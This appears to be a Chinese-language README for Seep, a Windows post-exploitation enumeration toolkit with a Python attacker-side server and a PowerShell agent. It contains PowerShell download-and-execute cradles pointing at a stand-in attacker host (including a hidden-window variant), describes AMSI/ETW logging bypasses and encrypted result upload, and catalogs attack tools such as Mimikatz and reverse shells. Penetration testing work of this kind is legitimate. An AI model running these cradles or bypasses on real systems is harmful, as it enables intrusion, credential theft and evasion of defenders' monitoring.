Real-Fruit-Snacks/Seep

## 快速开始 ### 前置条件 - **攻击机**（Kali 等）上安装 **Python** 3.9+ - **目标机**（Windows 8+ / Server 2012+）上安装 **PowerShell** 3.0+ ### 安装 ``` # pipx（推荐 -- 隔离环境） pipx install git+https://github.com/Real-Fruit-Snacks/Seep.git # 或从本地克隆 git clone https://github.com/Real-Fruit-Snacks/Seep.git cd Seep && pipx install . ``` ### 运行 ``` # 初始化工作区并启动服务器 seep init --workdir /tmp/op1 seep serve --workdir /tmp/op1 # 在目标上（服务器打印即用型 cradle 及认证令牌） powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://KALI_IP/agent.ps1?token=TOKEN')" # 从上传的结果生成报告 seep report /tmp/op1/results/results_*.json --format html --output report.html ``` ## 功能 ### 16 项枚举检查 模块化 PowerShell 检查模块，生成带有严重等级的结构化 JSON 结果： ``` # 完整代理（全部 16 项检查） seep compose --output agent.ps1 # 用于快速分类的最小代理 seep compose --checks system_info,user_privileges,quick_wins --output quick.ps1 # 混淆代理 seep compose --obfuscate --output obf_agent.ps1 ``` 检查内容包括系统信息、令牌权限、网络、补丁、快速利用、无人应答文件、Web 配置、服务、计划任务、启动项、AlwaysInstallElevated、软件清单、进程、DLL 劫持、目录树和注册表密钥。 ### 97 工具目录 按 7 个类别组织，包含 SHA256 完整性验证和通过 GitHub Releases 自托管分发： ``` # 列出所有工具 seep catalog list # 按类别筛选 seep catalog list --category TokenAbuse # 下载全部内容并验证 seep catalog download --all --workdir /tmp/op1 # 验证完整性 seep catalog verify --workdir /tmp/op1 ``` | 类别 | 数量 | 代表性工具 | |---|---|---| | 枚举 | 27 | WinPEAS、SharpUp、Seatbelt、Watson | | 凭证 | 12 | Mimikatz、LaZagne、SharpDPAPI、Rubeus | | 令牌滥用 | 10 | PrintSpoofer、GodPotato、JuicyPotato | | 活动目录 | 16 | SharpHound、Certify、Whisker、PowerView | | 隧道 | 9 | Chisel、Ligolo-ng、socat、netcat | | Impacket | 18 | secretsdump、psexec、wmiexec、ntlmrelayx | | 反弹 Shell | 5 | Nishang、PHP shell、netcat 变体 | ### MITRE ATT&CK 建议 每个结果都映射到 ATT&CK 技术，并提供可操作的利用指导——工具建议、示例命令和按严重程度排序的风险评级。 ### 无文件执行 代理通过 IEX 加载器完全在内存中运行。结果经过 AES-256-CBC 加密、压缩后通过 HTTP 上传。AMSI/ETW/脚本块日志自动绕过。零磁盘占用： ``` # 隐蔽变体 -- 无配置文件，隐藏窗口 powershell -ep bypass -NoP -W Hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://KALI_IP/agent.ps1?token=TOKEN')" ``` ### 单文件 HTML 报告 深色主题、独立的 HTML——无 CDN、无外部请求。包含执行摘要、每个结果的详细证据、修复指导和推荐工具： ``` # HTML 报告 seep report results.json --format html --output report.html # Markdown 报告 seep report results.json --format md --output report.md # JSON 摘要 seep report results.json --format json ``` ### 代理混淆 使用 `--checks` / `--exclude` 精选检查。使用 `--obfuscate` 应用标识符随机化——函数名、变量、HTTP 头和检查前缀均使用 CSPRNG 随机化。 ### OPSEC 保护 | 层级 | 保护措施 | |---|---| | 下载前 | 加载器中的 AMSI 绕过 | | 运行时 | 禁用 ETW + 脚本块日志 | | 网络 | IIS 服务器头欺骗、良性索引页 | | 认证 | 令牌 gated 端点（失败时返回 404，非 401/403）| | 传输 | AES-256-CBC 加密 + GZip 压缩 | | 身份 | CSPRNG 标识符随机化 | | 磁盘 | 默认无文件（IEX 加载器、内存执行）| ## 架构 ``` server/ ├── cli.py # Click-style CLI (init, serve, catalog, compose, report) ├── agent/ │ ├── checks/ # 16 PowerShell check modules with metadata headers │ ├── templates/ # Agent wrapper (Invoke-Seep entry point) │ └── composer.py # Assembles checks into single .ps1, identifier randomization ├── catalog/ │ ├── tools.yaml # 97 tool definitions (SHA256, categories, MITRE triggers) │ └── manager.py # Download, verify, symlinks, update check ├── http/ │ ├── serve.py # Unified HTTP handler (agent delivery, tool serving, upload) │ └── tls.py # Self-signed cert generation ├── results/ │ └── parser.py # JSON/ZIP upload parsing, schema validation └── report/ ├── recommendations.py # Finding-to-tool mapping with MITRE ATT&CK └── generator.py # HTML, Markdown, JSON report generation ``` 双组件架构：攻击机上的 Python CLI 负责协调一切，而组成的 PowerShell 代理在目标上运行并报告结果。 ## 平台支持 | 功能 | Linux（攻击机） | Windows（目标） | |---|---|---| | CLI 服务器 | 完整支持 | 完整支持 | | 代理执行 | 不适用 | PowerShell 3.0+（Windows 8+）| | 工具目录 | 完整支持（下载 + 服务）| 不适用 | | TLS 服务器 | 完整支持 | 完整支持 | | 报告生成 | 完整支持 | 完整支持 | | AMSI/ETW 绕过 | 不适用 | 完整支持 | ## 安全 请通过 [GitHub 安全公告](https://github.com/Real-Fruit-Snacks/Seep/security/advisories/new)（首选）或私下联系维护者报告安全问题。负责任披露时间线：90 天。请勿就漏洞开启公开问题。 Seep **不会**： - 利用发现的配置错误——仅进行枚举 - 维持持久访问——一次性代理，上传结果后结束 - 销毁证据或篡改日志 - 保证免杀——AMSI/ETW 绕过可能被高级解决方案检测到 ## 许可证 [MIT](LICENSE) —— 版权所有 2026 Real-Fruit-Snacks

标签：AI合规, Cloudflare, Conpot, DNS 反向解析, Fileless Agent, HTML报告, IPv6, MITRE ATT&CK, PE 加载器, PowerShell, Python, Web报告查看器, Windows安全, Windows提权, 代理, 代码生成, 凭证获取, 协议分析, 后渗透测试, 域渗透, 无后门, 无文件攻击, 无线安全, 权限提升, 枚举框架, 渗透测试工具, 电子数据取证, 知识库安全, 系统信息收集, 网络空间安全, 逆向工具